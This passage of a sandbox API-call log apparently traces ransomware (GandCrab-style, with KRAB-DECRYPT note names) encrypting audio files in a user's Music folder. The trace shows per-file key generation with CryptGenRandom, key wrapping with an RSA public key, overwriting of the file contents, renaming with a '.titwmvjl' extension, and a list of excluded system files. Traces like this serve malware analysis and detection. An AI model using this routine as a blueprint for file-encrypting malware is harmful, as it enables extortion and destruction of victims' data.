lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x3a1e, lpOverlapped=0x0) returned 1 [0092.897] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.897] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0092.898] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.903] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.903] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.903] CloseHandle (hObject=0x2b4) returned 1 [0092.904] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\fPu5rMcj8Fp4K1.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\fpu5rmcj8fp4k1.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\fPu5rMcj8Fp4K1.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\fpu5rmcj8fp4k1.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0092.905] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.905] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0092.905] lstrcmpW (lpString1="J-oNhvvRbn azz.wav", lpString2=".") returned 1 [0092.905] lstrcmpW (lpString1="J-oNhvvRbn azz.wav", lpString2="..") returned 1 [0092.905] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\", lpString2="J-oNhvvRbn azz.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\J-oNhvvRbn azz.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\J-oNhvvRbn azz.wav" [0092.905] lstrlenW (lpString=".titwmvjl") returned 9 [0092.905] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\J-oNhvvRbn azz.wav") returned 60 [0092.905] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.905] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\J-oNhvvRbn azz.wav.titwmvjl") returned 69 [0092.905] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\J-oNhvvRbn azz.wav") returned 60 [0092.905] lstrlenW (lpString=".wav") returned 4 [0092.905] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.905] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".wav ") returned 5 [0092.905] lstrcmpiW (lpString1=".wav", lpString2=".titwmvjl") returned 1 [0092.906] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.906] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\J-oNhvvRbn azz.wav") returned 60 [0092.906] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\J-oNhvvRbn azz.wav") returned 60 [0092.906] lstrcmpiW (lpString1="J-oNhvvRbn azz.wav", lpString2="desktop.ini") returned 1 [0092.906] lstrcmpiW (lpString1="J-oNhvvRbn azz.wav", lpString2="autorun.inf") returned 1 [0092.906] lstrcmpiW (lpString1="J-oNhvvRbn azz.wav", lpString2="ntuser.dat") returned -1 [0092.906] lstrcmpiW (lpString1="J-oNhvvRbn azz.wav", lpString2="iconcache.db") returned 1 [0092.906] lstrcmpiW (lpString1="J-oNhvvRbn azz.wav", lpString2="bootsect.bak") returned 1 [0092.906] lstrcmpiW (lpString1="J-oNhvvRbn azz.wav", lpString2="boot.ini") returned 1 [0092.906] lstrcmpiW (lpString1="J-oNhvvRbn azz.wav", lpString2="ntuser.dat.log") returned -1 [0092.906] lstrcmpiW (lpString1="J-oNhvvRbn azz.wav", lpString2="thumbs.db") returned -1 [0092.906] lstrcmpiW (lpString1="J-oNhvvRbn azz.wav", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0092.906] lstrcmpiW (lpString1="J-oNhvvRbn azz.wav", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0092.906] lstrcmpiW (lpString1="J-oNhvvRbn azz.wav", lpString2="KRAB-DECRYPT.html") returned -1 [0092.906] lstrcmpiW (lpString1="J-oNhvvRbn azz.wav", lpString2="CRAB-DECRYPT.html") returned 1 [0092.906] lstrcmpiW (lpString1="J-oNhvvRbn azz.wav", lpString2="KRAB-DECRYPT.txt") returned -1 [0092.906] lstrcmpiW (lpString1="J-oNhvvRbn azz.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.906] lstrcmpiW (lpString1="J-oNhvvRbn azz.wav", lpString2="ntldr") returned -1 [0092.906] lstrcmpiW (lpString1="J-oNhvvRbn azz.wav", lpString2="NTDETECT.COM") returned -1 [0092.906] lstrcmpiW (lpString1="J-oNhvvRbn azz.wav", lpString2="Bootfont.bin") returned 1 [0092.906] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\J-oNhvvRbn azz.wav") returned 60 [0092.906] lstrlenW (lpString=".wav") returned 4 [0092.906] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.906] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".wav ") returned 5 [0092.906] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.906] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.907] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\J-oNhvvRbn azz.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\j-onhvvrbn azz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0092.907] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.907] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0092.908] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.908] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.908] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0092.908] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.908] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.909] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.909] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0092.909] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.909] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.909] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.909] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.909] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0092.909] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.910] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.910] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.910] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0092.910] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.910] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.910] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.910] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.910] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0092.911] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.911] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503978) returned 1 [0092.911] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.911] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0092.911] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.911] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0092.911] GetLastError () returned 0x0 [0092.911] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.911] CryptDestroyKey (hKey=0x503978) returned 1 [0092.912] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.912] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.912] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.912] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0092.912] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.912] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0092.912] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.912] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0092.912] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.913] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0092.913] GetLastError () returned 0x0 [0092.913] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.913] CryptDestroyKey (hKey=0x5036f8) returned 1 [0092.913] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.913] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.913] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.913] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.914] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x9347, lpOverlapped=0x0) returned 1 [0092.926] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff6cb9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.926] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x9347, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x9347, lpOverlapped=0x0) returned 1 [0092.927] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.927] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0092.928] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.932] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.932] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.933] CloseHandle (hObject=0x2b4) returned 1 [0092.936] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\J-oNhvvRbn azz.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\j-onhvvrbn azz.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\J-oNhvvRbn azz.wav.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\j-onhvvrbn azz.wav.titwmvjl"), dwFlags=0x1) returned 1 [0092.937] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.937] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0092.937] lstrcmpW (lpString1="LjY8Q.m4a", lpString2=".") returned 1 [0092.937] lstrcmpW (lpString1="LjY8Q.m4a", lpString2="..") returned 1 [0092.937] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\", lpString2="LjY8Q.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\LjY8Q.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\LjY8Q.m4a" [0092.937] lstrlenW (lpString=".titwmvjl") returned 9 [0092.937] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\LjY8Q.m4a") returned 51 [0092.937] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.937] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\LjY8Q.m4a.titwmvjl") returned 60 [0092.937] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\LjY8Q.m4a") returned 51 [0092.937] lstrlenW (lpString=".m4a") returned 4 [0092.937] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.938] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".m4a ") returned 5 [0092.938] lstrcmpiW (lpString1=".m4a", lpString2=".titwmvjl") returned -1 [0092.938] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.938] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\LjY8Q.m4a") returned 51 [0092.938] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\LjY8Q.m4a") returned 51 [0092.938] lstrcmpiW (lpString1="LjY8Q.m4a", lpString2="desktop.ini") returned 1 [0092.938] lstrcmpiW (lpString1="LjY8Q.m4a", lpString2="autorun.inf") returned 1 [0092.939] lstrcmpiW (lpString1="LjY8Q.m4a", lpString2="ntuser.dat") returned -1 [0092.939] lstrcmpiW (lpString1="LjY8Q.m4a", lpString2="iconcache.db") returned 1 [0092.939] lstrcmpiW (lpString1="LjY8Q.m4a", lpString2="bootsect.bak") returned 1 [0092.939] lstrcmpiW (lpString1="LjY8Q.m4a", lpString2="boot.ini") returned 1 [0092.939] lstrcmpiW (lpString1="LjY8Q.m4a", lpString2="ntuser.dat.log") returned -1 [0092.939] lstrcmpiW (lpString1="LjY8Q.m4a", lpString2="thumbs.db") returned -1 [0092.939] lstrcmpiW (lpString1="LjY8Q.m4a", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0092.939] lstrcmpiW (lpString1="LjY8Q.m4a", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0092.939] lstrcmpiW (lpString1="LjY8Q.m4a", lpString2="KRAB-DECRYPT.html") returned 1 [0092.939] lstrcmpiW (lpString1="LjY8Q.m4a", lpString2="CRAB-DECRYPT.html") returned 1 [0092.939] lstrcmpiW (lpString1="LjY8Q.m4a", lpString2="KRAB-DECRYPT.txt") returned 1 [0092.939] lstrcmpiW (lpString1="LjY8Q.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.939] lstrcmpiW (lpString1="LjY8Q.m4a", lpString2="ntldr") returned -1 [0092.939] lstrcmpiW (lpString1="LjY8Q.m4a", lpString2="NTDETECT.COM") returned -1 [0092.939] lstrcmpiW (lpString1="LjY8Q.m4a", lpString2="Bootfont.bin") returned 1 [0092.939] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\LjY8Q.m4a") returned 51 [0092.939] lstrlenW (lpString=".m4a") returned 4 [0092.939] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.939] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".m4a ") returned 5 [0092.939] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.939] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.940] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\LjY8Q.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\ljy8q.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0092.940] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.940] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.941] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.941] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0092.941] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.942] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.942] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.942] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0092.942] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.942] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.942] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.942] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.942] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0092.943] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.943] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.943] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.943] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0092.943] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.943] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.943] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.944] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.944] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0092.944] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.944] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503778) returned 1 [0092.944] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.945] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0092.945] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.945] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0092.945] GetLastError () returned 0x0 [0092.945] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.945] CryptDestroyKey (hKey=0x503778) returned 1 [0092.945] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.945] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.945] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.946] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0092.946] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.946] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503578) returned 1 [0092.946] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.946] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0092.946] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.946] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0092.947] GetLastError () returned 0x0 [0092.947] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.947] CryptDestroyKey (hKey=0x503578) returned 1 [0092.947] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.947] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.947] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.947] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.947] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0xfd51, lpOverlapped=0x0) returned 1 [0092.960] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff02af, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.960] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xfd51, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0xfd51, lpOverlapped=0x0) returned 1 [0092.961] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.961] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0092.962] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.966] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.966] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.966] CloseHandle (hObject=0x2b4) returned 1 [0092.967] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\LjY8Q.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\ljy8q.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\LjY8Q.m4a.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\ljy8q.m4a.titwmvjl"), dwFlags=0x1) returned 1 [0092.967] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.968] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0092.968] lstrcmpW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2=".") returned 1 [0092.968] lstrcmpW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="..") returned 1 [0092.968] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\", lpString2="OxXKE7MmkWg9dzN.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\OxXKE7MmkWg9dzN.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\OxXKE7MmkWg9dzN.mp3" [0092.968] lstrlenW (lpString=".titwmvjl") returned 9 [0092.968] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\OxXKE7MmkWg9dzN.mp3") returned 61 [0092.968] VirtualAlloc (lpAddress=0x0, dwSize=0xba, 